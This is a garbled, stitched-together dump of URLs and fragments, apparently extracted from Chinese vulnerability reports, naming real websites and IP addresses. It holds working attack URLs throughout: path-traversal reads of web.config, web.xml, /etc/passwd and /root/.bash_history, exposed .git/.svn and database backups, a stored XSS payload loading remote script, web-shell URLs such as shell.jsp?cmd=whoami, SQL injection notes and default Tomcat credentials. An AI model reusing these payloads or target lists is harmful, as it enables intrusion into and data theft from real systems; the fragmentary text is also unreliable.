http://mxunjian.club.xywy.com http://61.160.182.13/吉林 http://175.30.250.213/江苏 http://lbj.cikuu.com/ http://www.xinhuamed.com.cn/school/download.asp?cataid=28 http://103.26.1.180:8081/.svn/entries http://www.inglian.com/.svn/entries http://console-temp.showjoy.com/login http://taiwan.zizaike.com/user/91990/orderview/343518?page=1&os=mobile http://taiwan.zizaike.com/user/91990/orderview/343519?page=1&os=mobile http://202.120.199.94:82/ http://niu.lashou.com/index.php http://niu.lashou.com/public/Public/out_password_set http://niu.lashou.com inurl:ineduportal http://www.fhez.cn测试 http://www.fhez.cn/IneduPortal/Components/news/FileDown.aspx?OldName=保存文件名.txt&NewName=../web.config http://www.tjbhbus.com/ http://60.29.214.36:8081/Logon/UserLogon.aspx http://czrcb.net/ https://e.czrcb.net/ http://121.28.6.5:8888/LoginAction.do?actionType=quit http://www.mojichina.com http://uc.mojichina.com/findpwd?callback=http://bbs.mojichina.com/forum.php http://m.s.cn/member/receiver/ http://tjdt.tbmmis.com/Login.aspx http://www.fyyhbank.com/ https://e.fyyhbank.com/ http://wuxia.sgamer.com/bushandang/ http://**.**.**/pshop/login/login.jsp http://xue.huaji.com/space/business.php?u=1199795328 http://xue.huaji.com/space/business.php?u=1199795328 http://www.189kd.cn:80/ http://cz.189kd.cn:80/ http://hz.189kd.cn:80/ http://zh.189kd.cn:80/ http://sz.189kd.cn:80/ http://fs.189kd.cn:80/ http://dg.189kd.cn:80/ http://zs.189kd.cn:80/ http://mz.189kd.cn:80/ http://zq.189kd.cn:80/ http://gz.189kd.cn:80/ http://www.189kd.cn:80/ www.189kd.cn http://lib.wap.zol.com.cn/bbs/content.php?bbsid=3&bid=30&bookid=7301 http://www.s.cn/member-2540670-del_sys_msg.html http://www.s.cn/member-2540670-del_sys_msg.html http://www.s.cn/member-2540628-del_sys_msg.html http://www.s.cn/member-2540627-del_sys_msg.html http://www.s.cn/member-2540626-del_sys_msg.html http://www.s.cn/member-2540670-del_sys_msg.html https://www.baidu.com https://www.pingan.com.cn/pinganone/pa/accounts_overview/setPFToken.jsp?url=https://www.pingan.com.cn/idp/startSSO.ping?PartnerSpId=bankSP%26TargetResource=https://www.baidu.com https://www.pingan.com.cn/idp/startSSO.ping?PartnerSpId=bankSP&TargetResource=https://www.baidu.com http://iosappapi.wepiao.com/index.php?a=filmdetail&c=film&m=web&fid=5577 http://iosappapi.wepiao.com/index.php?a=seatinfo&c=film&mpid=556e6c3eba8e7f73168bfdbb&m=web&cinemaid=1004676&hid=3197&fid=5577 http://www.wepiao.com/?a=filmdetail&c=film&m=web&fid=5420 http://www.wepiao.com/?a=cinemadetailshow&c=cinema&m=web&cinemaid=1004676 http://run.ikang.com/ index.php/user/DoResetPassword.html www.p2p222.com http://www.showjoy.com/ http://www.p2p222.com/index.php/user/Login.html http://www.nffund.com/fundList.jsp?company=1 http://218.7.239.170:81/UserCertList.aspx?ID=0100031 http://www.spjdz.com/UserCertList.aspx?ID=0100031 http://www.thszjz.com/UserCertList.aspx?ID=0100031 http://www.hyjsjd.cn/UserCertList.aspx?ID=0100031 http://www.jljszj.gov.cn/UserCertList.aspx?ID=0100031 http://tsg.hacz.edu.cn/Message.aspx?SectionId=7321547b-9cb0-4b2e-a7b6-8d50ccb72f9e http://lib.haut.edu.cn/message.aspx?SectionId=8aef847d-08da-443f-b781-9a61c7e75ae5 http://210.45.134.251/Message.aspx?SectionId=a2a03a1e-8c18-40e5-97d1-7db9776c9fe6 http://www.nhlib.com.cn/Message.aspx?SectionId=5b21dc80-687b-4991-add8-0bb7e791faf2 http://lib.nyxx.sh.cn/nxtsg/Message.aspx?SectionId=c5ba6f29-6213-491a-9134-9068f1c3792a http://trend.baidu.lecai.com/ssq/red23SpanTrend.action?recentPhase=100&onlyBody=true&phase http://bcm.open.com.cn/login.aspx密码字段可以注入,虽然用了c#的防注入,但还是可以用sqlmap直接注入。 http://zucc.ctvc.tv/index.jsp http://try.suning.com/tps/report/listReport.htm http://60.170.41.219:7001/defaultroot/LogonAction.do http://www.myuios.com http://122.114.63.183:8082/Login.aspx httpp://appserver.showjoy.com/msg/list.html?page=1&userId=652434 https://cdc.zj.cn http://218.2.19.97/lgyzagl/aspx/JMGLogin.aspx http://218.2.19.97/lgyzagl/aspx/xuanze_yh2.aspx http://mingshi.wanfangdata.com.cn/Handler/UserControl/UserControlSync.ashx?Operate=CheckUserName&WFVUserName=wooyun&_=1433572345924 www.eloancn.com http://wiki.eoeandroid.com/.svn/entries https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=12112 https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=11112 https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=111 http://www.sdlc.lm.gov.cn http://member.suning.com/emall/GiftCardStaticPageView?storeId=10052&catalogId=10051 http://cart.suning.com/emall/SNEntityCardCmd?action=saveAddress&oldAddressId=&noAddUpt=0&addressId=&addressStr=Lily%3A%40%40%3A15189770036%3A%40%40%3A%3A%40%40%3A100%3A%40%40%3A9173%3A%40%40%3A11365%3A%40%40%3A146677%3A%40%40%3A%3C%2Ftextarea%3E%27%22%3E%3Cscript+src%3Dhttp%3A%2F%2Ft.cn%2FR29TAvp%3E%3C%2Fscript%3E http://dev.admin.shop.hichao.com/site/login http://app01.cast.org.cn:7050/download/download.jsp?filepath=/WEB-INF/web.xml http://kpym.cast.org.cn/web/download.jsp?fileName=../WEB-INF/web.xml http://java.sun.com/dtd/web-app_2_3.dtd http://crm.airpp.com/crmtravel/userManagerAction!login.action http://cicpa.wkinfo.com.cn http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh www.supor.com.cn/supor.sql http://inns.jinjiang.com/ http://demo.fnuo123.com/ http://dp.fnuo123.com/ http://dp.fnuo123.com/?mod=c2c&act=helper&id=132 http://dp.fnuo123.com/admin/?mod=&act=adv&ctrl=saveEdit margin-left:160px margin-bottom:20px http://60.171.18.27//teachweb/cxjk/SelectInterface.aspx http://teachweb.419.com.cn//cxjk/SelectInterface.aspx http://218.7.76.10:8080//teachweb/cxjk/SelectInterface.aspx http://223.72.237.130//teachweb/cxjk/SelectInterface.aspx http://sdjw.syu.edu.cn//teachweb/cxjk/SelectInterface.aspx http://shimo.yundasys.com:45149/adage/userlogin.action http://xynu.check.cnki.net/ www.dangshi.cnki.net:8080,成功上传Webshell后以备后用。 www.dangshi.cnki.net开放了80和8080端口。因为这两个服务器也无法连接外网,所以不能使用reverse_tcp来反弹meterpreter,只能考虑使用bind_tcp的方式。 http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo8.aspx?id=17 http://www.dtzwdt.gov.cn/portal/xzsp3/newsinfo8.aspx?id=19 http://211.142.37.152:89/portal/xzsp3/newsinfo8.aspx?id=11 http://www.gczw.gov.cn/portal/xzsp4/newsinfo8.aspx?id=19 http://www.gjzwzx.cn/portal/xzsp3/newsinfo8.aspx?id=19 http://itest.heep.cn/ http://preenglish.itest.fltrp.com/ http://itest.heep.cn/为例,问题的产生是由于该套建站软件使用的编辑器fck未正确配置 http://itest.heep.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://itest.heep.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://itest.heep.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://itest.heep.cn/UserFiles/wooyun.jsp http://itest.heep.cn/UserFiles/wooyun1.jsp http://itest.heep.cn/FCKeditor//.svn/entries http://itest.heep.cn/admin//.svn/entries http://itest.heep.cn/oa.log http://www.chinabidding.com.cn/download/download_file.jsp?record_id=4231669&filename=web.xml&filepath=../../../WEB-INF http://www.w3.org/TR/2003/WD-wsdl12-20030303/#ietf-draft http://111.11.28.14/Qt_logout.do http://kjxy.jxnu.edu.cn/ http://219.229.248.14/ http://www.dingruan.com/ http://www.dingruan.com/product-2.html http://www.dingruan.com/case.html http://www.bjzzjbz.com/Login.aspx http://118.125.106.216:88/Login.aspx http://220.189.233.18:81/Login.aspx http://www.6years.org/Login.aspx http://125.65.92.216:81/Login.aspx http://202.117.122.44/dlib/homepage/news/news_list.asp?action=list&lang=gb http://211.81.174.133:81/dlib/homepage/news/news_list.asp?action=list&lang=gb http://210.37.2.181/dlib/homepage/news/news_list.asp?action=list&lang=gb http://202.118.250.140/dlib/homepage/news/news_list.asp?action=list&lang=gb http://210.34.4.3/dlib/homepage/news/news_list.asp?action=list&lang=gb http://202.195.177.13/ebook//homepage/news/news_list.asp?action=list&lang=gb http://ebook.nwu.edu.cn/homepage/news/news_list.asp?action=list&lang=gb http://dlib.gsjtxy.edu.cn/dlib/homepage/news/news_list.asp?lang=gb http://sxebooks.com/homepage/news/news_list.asp?lang=gb http://m.eloancn.com/wapwmps/.svn/entries http://whoa.caams.org.cn:7001/defaultroot/login.jsp?localeCode=zh_CN http://sws.suning.com/ http://www.kfnl.gov.cn http://i.club.sohu.com/?action=sendVcode&controller=ajax http://www.suning.com.cn/article/noticshow.html?id=91551506020556 www.wepiao.com/?a=init&areano=57fa1a9acbe314b31791048436914425&c=cinema&m=web&pagetype=0 www.wepiao.com/?a=seatinfo&c=film&cinemaid=1 www.wepiao.com/index.php?a=seatinfo&c=film&cinemaid=1003990&fid=5568&hid=2&m=web&mpid=5571395fba8e7fbb4b8ba4e3&scheid= www.wepiao.com/index.php?a=comepaynew&c=film&m=web&orderid=1 https://54.255.168.149/ http://my.suning.com/authStatus?callback=jQuery17206592 http://my.suning.com/memberInfoPageHead.do?callback=jQuery1720402 http://www.suning.com/emall/myShoppingOrderCmd?itemNum=3&callback=jQuery1720659299 http://my.suning.com/address.do?callback=jQuery172081 www.eqiyun.cn http://www.eqiyun.cn/cloud/uploadeFiles/img/headerImage/1432891846112/2203803155802475043.jsp http://www.husor.com.cn/ http://ticket.husor.com.cn/ http://ticket.husor.com.cn/users/183 http://travel.xiamenair.com/Travel/Domestic.html?start=%7Cundefined&end=%25u53A6%25u95E8%7CXMN http://www.wlyfw.com/phpmyadmin/ http://g.gome.com.cn/ec/homeus/support/add.jsp?callback=jQuery17&method=homeus.checkAllItem¶ms=%7B%22time%22%3A1433603338755%7D http://g.gome.com.cn/ec/homeus/navigation/gome/index/loginStyle.jsp?callback=logintop http://g.gome.com.cn/ec/homeus/n/topMygome.jsp?callback=topMygome http://member.gome.com.cn/myaccount/address/getSecondaryAddress?timer=1433606988720&callback=ckdata http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123 http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123 http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123 http://www.xtep.com.cn/pay/&order_sn=150606002066 http://www.xtep.com.cn/pay/&order_sn=150606002042 http://www.xtep.com.cn/?app_act=mem_center/index/order_info&order_sn=150606002042 http://8007117228.com/login.action www.1510cloud.com http://hyt.wuhan.net.cn/中国电信武汉分公司 http://tc.chinatietong.net/中国铁通空中会议室管理系统 http://dhhy.xaonline.com/陕西省电信公司电话会议系统 http://211.138.195.27/华为电话会议系统 http://211.139.93.135:8080/华为电话会议系统 http://newconf.bjtelecom.com.cn/北京联通电话会议系统 http://interchat.bjtelecom.com.cn/北京联通电话会议系统(不同ip) http://hyt.wuhan.net.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=C:\Windows\system.ini http://hyt.wuhan.net.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=D:/webv5.2/resin-pro-3.0.14/conf/resin.conf http://www.citsha.com/list.php?sid=4 http://m.eloancn.com/wapwmps/loginOnMobile.jsp http://www.jinjianginns.com/的修改密码处,不需要原密码即可修改新密码。 http://mem.tsinghua.edu.cn/ShowPic.asp?PicID=29 http://mem.tsinghua.edu.cn/Admin/login.asp http://www.sino-life.com/ http://health.703804.com/.svn/entries http://a.703804.com/admin.php http://fr.linekong.com/xml/common.php?sort_id=* http://home.70.com/.svn/entries http://www.anta.com/Inchon2014/admin/admin_index.php http://ticket.husor.com.cn/ http://61.129.250.82/ http://61.129.250.82/staff/conf/demo2.jsp http://pos.dapu.com:90/bpos/getUserInfoJSON.jsp?storeids=select%20a.C_STORE_ID%20from%20users http://dag.shou.edu.cn/Search.aspx?search=%E5%9B%BE%E7%89%87,注入参数search http://web.kuaipan.cn/user/login处多次输入错误的账号密码,都未有图片验证码以及IP锁定策略。 www.kuaipan.cn http://www.kuaipan.cn http://xb.cuit.edu.cn/ http://xb.cuit.edu.cn/eweb/admin_login.asp http://**.**.**/login.jsp http://58.67.199.202:8090/admin/login.oo http://www.tna.com.tw/.git/ http://bat.sanquanxianshi.com http://118.26.133.98:443/svn jdbc:mysql://sanquan01.mysql.rds.aliyuncs.com:3306/sanquan?useUnicode=true&characterEncoding=utf8 jdbc:oracle:thin:@115.28.53.202:1521:dev jdbc:oracle:thin:@211.151.211.168:1521:orcl comifengnewsclient://call?type=doc&id= http://api.iclient.ifeng.com/ipadtestdoc?aid=99008381),返回的是一个json,其中包含这个新闻的所有信息。然后这个app就会按照这个json文件把新闻展示在页面上。整个过程完全没有验证URL或者是信息来源。 comifengnewsclient://call?type=doc&id=URLB。URLB中则返回一个虚假新闻的json,效果如图: http://31.220.48.93:28214/if/fakenewsjm.html http://api.iclient.ifeng.com/ipadtestdoc?aid=99008381)包含新闻信息的json中,出现了html标签!这也就以为着这写信息非常有可能是展示在webview中的。首先的想法就是在json的title字段添加js语句,发现不能执行,百思不得其姐!后来突然想到既然能加载图片,那图片的事件呢?果断在之前的字段加上 http://116.211.28.174:8080/services.html http://www.sinochemoil.com/esbclient/layout/Export.php http://hnhp6660201.w215.bizcn.com/qghk_content.asp?ID=13 http://hnhp6660201.w215.bizcn.com/login.htm http://user.yaolan.com/ http://user.yaolan.com/FindPwdSuccess.aspx?uname=admin http://121.33.234.163:1122/sys/Login/login.do dir:D:\apache_tomcat\tomcat7_7080\webapps\ROOT\ http://121.33.234.163:8080/Cherry/index.html同样存在此漏洞 http://121.33.234.163:8088/移动办公管理平台 http://www.haier.com/cn/ JHSoft.WCF/POSTServiceForAndroid.svc/LoginNew http://test.sangfor.com.cn/ http://dev.theme.nubia.cn/ URL:http://www.chinaamc.com:80/portal/en/second.jsp http://doogua.dangdang.com/ http://doogua.dangdang.com/f.php http://doogua.dangdang.com/memcache.php http://im.suning.com/ http://www.bawang.com.cn/System/backup_datebase.asp http://www.qhgsf.com/wwwroot.rar http://www.beilingdi.com/ http://61.237.231.66:82/doc/page/login.asp http://doogua.dangdang.com http://doogua.dangdang.com/auth http://fuzhou.chaoxing.com/ http://fuzhou.chaoxing.com/api/front/book/bookDetail/first?dxNumber=000007851564&d=C87FEE5A48836CA748F6F0537A183B33&fenlei=151112 http://zb.suning.com/bid-web/initSupplierApply.htm?supplierNo=SN00000432&proNo=SNZ8014150228951是打不开的,但是我注册任意一个账户后,再次点击发现 http://zb.suning.com/bid-web/openSupApplyInfo.htm?supplierNo=SN00001763&proNo=SNZ8201141024933 http://zb.suning.com/bid-web/openSupApplyInfo.htm?supplierNo=SN00000432&proNo=SNZ8000141024924 http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com http://www.lijiejie.com/wp-content/uploads/2015/04/tencent.com_.txt http://admin.choumei.cn/index.php/Login/index index.php/Login/doSubmitLogin http://yunpan.chaoxing.com/ http://www.bestv.com.cn/index.php?a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1&movie_special=1&movie_type=4&order=id http://www.bestv.com.cn/index.php?a=lists&c=index&catid=27&m=content&modelid=11&platform=1 passport.suning.com/ids/login POST:jsonViewType=true&username=§username§&password=§password§&loginTheme=defaultTheme&loginChannel=208000000000&rememberMe=false needVerifyCode:true Activity:com.suning.mobile.paysdk.ui.CashierPrepareActivity com.suning.mobile.ebuy/com.suning.mobile.paysdk.ui.CashierPrepareActivity http://www.zgkjb.com/epaper/test/regist.jsp?dowhat=registsave http://www.yxdaily.com/epaper/test/regist.jsp?dowhat=registsave http://61.166.63.106:9999/epaper/test/regist.jsp?dowhat=registsave http://dyrb.dy001.cn:9999/epaper/test/regist.jsp?dowhat=registsave http://newcity.zzbtv.com/epaper/test/regist.jsp?dowhat=registsave http://epaper.xinjiangnet.com.cn/epaper/test/regist.jsp?dowhat=registsave http://epaper.xinjiangnet.com.cn/epaper/test/regist.jsp?dowhat=registsave http://www.zxsx.org/h_admin/add_xinyong1.asp http://www.zxsx.org/h_admin/add_xinyong1.asp?id=1078&pages=1 http://edoas.scedu.net:8080/oa encap:Ethernet AE:BF:C4 addr:192.168.24.136 Bcast:192.168.24.159 Mask:255.255.255.224 feae:bfc4/64 Scope:Link MTU:1500 packets:27311605 packets:33981021 txqueuelen:1000 http://www.eefocus.com/.git http://bbs.lengxiaohua.com/ http://bbs.lengxiaohua.com/uc_server/ www.buygaga.com http://61.142.174.200/cwc/KFweb/kfsf/Sf_HzQuery.aspx http://www.shcdkf.com/kfweb/kfsf/Sf_HzQuery.aspx http://gzcx.tynu.edu.cn/kfweb/kfsf/Sf_HzQuery.aspx http://cwch.ahu.edu.cn/querynetweb/kfsf/Sf_HzQuery.aspx http://221.5.51.228/cjb//kfsf/Sf_HzQuery.aspx http://www.cqvie.com/xfcxbn/kfsf/Sf_HzQuery.aspx http://cwcx.jlsu.edu.cn/kfsf/Sf_HzQuery.aspx http://cw.syu.edu.cn:8080/kfweb/kfsf/Sf_HzQuery.aspx http://cwcx.jlsu.edu.cn/kfsf/Sf_HzQuery.aspx http://www.euse.com.cn/cases_2.html http://tms.sfdj.gov.cn/ http://study.euse.com.cn/ http://yajs.net/ http://www.lszxpx.com/ http://www.jiudianxueyuan.com/ http://elearning.chang-de.com:6088/ http://mail.hlctc.com.cn:801/ http://typecho.org http://forum.typecho.org/viewforum.php?f=19 https://www.wuxinyanglao.com/loginController.do?login http://admin.wuxinyanglao.com http://p.91zdb.com/ http://my.yili.com/RMS/SubModule/Login/LoginR.aspx http://my.yili.com/RMS.rar http://www.tsrcbank.com/ http://shop.vivo.com.cn/ http://shop.vivo.com.cn/paycenter-result_pay-XXXXXXXX-true.html http://shop.vivo.com.cn/paycenter-result_pay-150608173139659-true.html http://shop.vivo.com.cn/paycenter-result_pay-150324162591453-true.html http://shop.vivo.com.cn/paycenter-result_pay-150323235725856-true.html http://shop.vivo.com.cn/paycenter-result_pay-150322123902694-true.html http://shop.vivo.com.cn/paycenter-result_pay-150406213409944-true.html http://shop.vivo.com.cn/paycenter-result_pay-150406014692495-true.html http://oa.cmst.com.cn/ http://oa.cmst.com.cn/jmx-consoleing进行getshell http://116.228.99.1/ http://116.228.99.2/ http://116.228.99.25/ http://116.228.99.57/ http://116.228.99.129/ http://116.228.99.137/ http://116.228.99.145/ http://116.228.99.161/ http://116.228.99.214/ http://php.xingshulin.com/blog/php/get.php?id=65&act=get_one_article http://php.xingshulin.com/blog/php/get.php?id=65%27&act=get_one_article http://files.vivo.com.cn/.git/config http://market.douban.com/ http://yl***.yaolan.com/***/ http://www.iyoungsh.com/tickets/int_order.aspx?a=53 http://www.willtravel.cn/tickets/int_order.aspx?a=53 http://www.hangshunda.com.cn/tickets/int_order.aspx?a=53 http://flight.zhelun.com/tickets/int_order.aspx?a=53 http://www.cht-travel.com/tickets/int_order.aspx?a=53 http://book.yccas.com/tickets/int_order.aspx?a=53 http://www.qichen-air.com/tickets/int_order.aspx?a=53 http://dgdz.xzit.edu.cn/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://210.43.24.201:8080//model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://hzhlab.hytc.edu.cn/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://labch.cumt.edu.cn:81/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://210.27.176.162/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://store.tdxinfo.com/ http://ship.tdxinfo.com/tops-front-purchaser-cruise/order/detail?id=YL150608000010 http://shop.vivo.com.cn/gallery-diff.html http://shop.vivo.com.cn/member-ajax_fav.html http://shop.vivo.com.cn http://www.zjmb.gov.cn/ ftp://www.zjmb.gov.cn http://www.1000plan.org/news/61?tag=%E4%BF%A1%E6%81%AF%E7%A7%91%E6%8A%80 com.suning.mobile.epa/com.suning.mobile.paysdk.ui.CashierPrepareActivity http://61.184.240.98/ http://iwssit.suning.com http://admin.yinyuetai.com/ http://shop.admin.yinyuetai.com http://**.**.**/Manager/Login.aspx_ http://61.242.102.54:8080 http://www.hyxlib.com/MessageList.aspx?SectionId=0c634828-5a69-41c3-83dd-5e2b605ff07f http://210.45.134.251/MessageList.aspx?SectionId=a2a03a1e-8c18-40e5-97d1-7db9776c9fe6 http://lib.zisu.edu.cn/MessageList.aspx?SectionId=96931ccb-a9ca-412b-9415-5436554427b0 http://lib.shafc.edu.cn/tsg/MessageList.aspx?SectionId=17f366c5-ab9f-4e85-ac14-7720362a2e05 http://tsg.hacz.edu.cn/MessageList.aspx?SectionId=7321547b-9cb0-4b2e-a7b6-8d50ccb72f9e http://lib.nyxx.sh.cn/nxtsg/MessageList.aspx?SectionId=c5ba6f29-6213-491a-9134-9068f1c3792a http://www.hbems.com.cn/Search.asp inurl:web_programs_dotnet/ http://www.lyjyw.gov.cn/web/web_programs_dotnet/member/Default.aspx http://web.ptjy.gov.cn/web/web_programs_dotnet/member/Default.aspx http://school.mwedu.gov.cn/web/web_programs_dotnet/member/Default.aspx http://school.gledu.gov.cn/web/web_programs_dotnet/member/Default.aspx http://school.zzxcjy.com/web/web_programs_dotnet/member/Default.aspx http://school.zzlwjy.com/web/web_programs_dotnet/member/Default.aspx http://school.fjhajy.gov.cn/web/web_programs_dotnet/member/Default.aspx http://www.zzyxjy.com/web/web_programs_dotnet/member/Default.aspx http://125.71.200.170:8000/ http://218.7.239.170:81/InstCertList.aspx?ID=0100061 http://www.spjdz.com/InstCertList.aspx?ID=0100061 http://www.thszjz.com/InstCertList.aspx?ID=0100061 http://www.hyjsjd.cn/InstCertList.aspx?ID=0100061 http://www.jljszj.gov.cn/InstCertList.aspx?ID=0100061 http://eln.meizu.com http://www.zlms.org/index.html没有发现有下载源码的地方。看到有官方案例 ftp://download.dhgate.com http://124.207.169.19:80/manager/html http://aboutus.cits.cn/ http://aboutus.cits.cn:80//cits/images/1x.asp http://uac.xy189.cn/html/ http://58.53.194.85:8081/ rdp://58.53.194.85:8890 http://sms.xy189.cn/login.action http://sms.xy189.cn/login.action http://try.xy189.cn/showhopo.aspx?id=100862 http://try.xy189.cn/showhopo.aspx?id=100862 http://**.**.**/ http://**.**.**/ https://per.cmbc.com.cn/pweb/SignInfoQry.do https://per.cmbc.com.cn/pweb/FdHisListQry.do https://per.cmbc.com.cn/pweb/FundTrsQryPre.do http://www.365heart.com/Console/NewsManage/Admin_News_Add.asp?newsid= http://www.365heart.com/show/107497.shtml http://www.365heart.com/Console/NewsManage/Admin_News_Add.asp?newsid=107497 http://61.129.102.46/ http://www.zlmai.com/pay.php?orderid=572 https://portal.haier.com/web/reSetPassWord/reset?replyType=1&cn=000*****&tel=&email=&wwwmail=********@163.com https://portal.haier.com/web/infoVeify.jsp https://portal.haier.com/web/reSetPassWord/reset?replyType=1&cn=000*****&tel=&email=&wwwmail=********@163.com http://m.cits.cn/ http://m.cits.cn/login.html http://m.cits.cn http://125.88.112.151/auth/ http://www.tudou.com/programs/view/ri6jjwGldso/?qq-pf-to=pcqq.c2c http://e.dangdang.com/bbs/.git/ www.harbin-electric.com/gdrw/admin/news_manage/news_list.asp?p=2&type_id=1存在布尔型盲注;可获得账户口令(admin/meijing),登陆目标管理系统http://www.harbin-electric.com/gdrw/admin/login.asp,发现登陆该目标系统后,通过修改url地址,可直接访问最终后台http://www.harbin-electric.com/admin/,尽管未知终极管理后台的口令,但由于已登陆系统未设置隔离机制,所以可直接访问目标后台,进入目标后台,可随意查看用户数据信息,发布传播恶意新闻,对整个系统的安全性造成严重的安全危害; http://w.wps.cn/ http://w.wps.cn http://video.wanfangdata.com.cn/manage/index.jsp zmao.cc/myadmin/log.txt就能看管理员登录过的用户名和密码 zmao.cc/web.rar就可以下载网站的备份。里面包还有数据库备份 https://github.com/yangwanyuan/mana_backend/blob/394e1b9add13aa1d180848bf313606660b86f4ab/etc/mana_monitor.conf url:http://202.102.109.8:80/manager/html user:tomcat pass:tomcat http://www.nbems.net//down/class/index.php?myord=1 Site:http://www.4007123123.com/index.aspx http://www.4007123123.com/UserHome/MyInfo.aspx http://www.4007123123.com/UserHome/MyAddress.aspx http://www.4007123123.com/UserHome/MyAddress.aspx?id=146096 http://www.4007123123.com/UserHome/MyAddress.aspx?id=146095 http://www.4007123123.com/UserHome/MyAddress.aspx?id=4650 http://xiangyouji.com.cn/admin http://61.183.35.213/zbgg?id= http://61.183.35.213/login http://61.183.35.213/resources/articles/2431/wooyun.jsp.jpg http://mail.tjutcm.edu.cn http://pan.baidu.com/s/1c0EWybQ http://pan.baidu.com/s/1c0EWybQ http://pan.baidu.com/s/1c0EWybQ http://admin.cmgame.com:8168/bme/customCp/copModCourseprm.action?isFlush=true&goPage=basicprm&isChange=1&usertype=cp&objectId=101957&hideTax=1&ticketValidate=NO.9085231 http://211.151.59.14 http://211.151.59.13 http://211.151.59.27 http://211.151.59.14/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://211.151.59.14/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://211.151.59.14/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://nqsms.netqin.com/ http://211.151.59.13/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://211.151.59.13/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://211.151.59.13/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://61.189.35.4:8080/ http://www.9rx.com.cn http://www.ksgt.gov.cn/mod/shop/quest/ajax.php?op=auction_buy&tid=-1 www.xinyiwater.gov.cn/SiteWeaver3.mdb http://www.chncto.com/heikejishu/10629.html http://www.xinyiwater.gov.cn/1xq17.asp http://218.28.166.70:8080/onlinetalk/index.do http://www.hazz.hrss.gov.cn:8080/cx/073.html https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&formdir=1&reason=0 https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=3 https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=4 https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=5 https://vpn.ctrip.com/prx/000/http/localhost/login http://www.xiami.com/collect/101274090?spm=a1z1s.6626001.229054137.2.Z606cM http://114.247.103.242/econline/ http://114.247.103.242:8002/app/shell.jsp?cmd=whoami http://**.**.** ftp://**.**.** ftp://**.**.**/FAW-VW/Faw.DDMP_WS/Web.config http://wanmei.hiall.com.cn/.git/config http://cs.kdweibo.com/space/c/user/forget-password www.kdweibo.com http://im.kdweibo.com/xtweb/web/login.jsp https://www.sncfc.com.cn http://72wan.voc.com.cn/.svn/entries http://72wan.voc.com.cn/?s=/Help/show/catid/44* http://www.grainnews.com.cn:9998/epaper/search/advresult.jsp http://219.156.123.48:8080/epaper/search/advresult.jsp http://61.153.66.148/epaper/search/advresult.jsp http://health.lsol.cc/epaper/search/advresult.jsp http://szb.stxqw.com/epaper/search/advresult.jsp http://61.166.63.106:9999/epaper/advsearch/advresult.jsp http://qyepaper.zjol.com.cn/epaper/advsearch/advresult.jsp http://www.grainnews.com.cn:9998/epaper/search/advresult.jsp http://m.tuanche.com/yzmdl?iosFlag= http://m.the9.com/.git/config http://www.baifendian.com/ http://passport.baifendian.com/handOut.action android:name="com.meituan.android.base.hybrid.HybridWebViewActivity android:launchMode="0 android:screenOrientation="1 android:configChanges="0x000000A0 android:name="android.intent.action.VIEW android:name="android.intent.category.DEFAULT android:name="android.intent.category.BROWSABLE android:scheme="imeituan android:host="www.meituan.com android:path="/hybrid/web http://search.weiqi.sports.tom.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://202.108.12.240/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/usr/local/webapps/weiqi/wqsearch.jsp http://202.108.12.240/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://202.108.12.240/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.93yin.com/index.php?r=default/photo/zpbc&id=27 http://hd.tiexue.net/ https://github.com/LyonWong/Framework-LY/blob/aea17fc85bc5667a9c7408c089d6c2b6933a658c/config/.conf/email.php http://www.imooc.com/code/3541 http://www.wanxinsoft.com/ http://dgdz.xzit.edu.cn/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://182.129.150.10:8001/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://hzhlab.hytc.edu.cn/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://sys.zafu.edu.cn:81/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 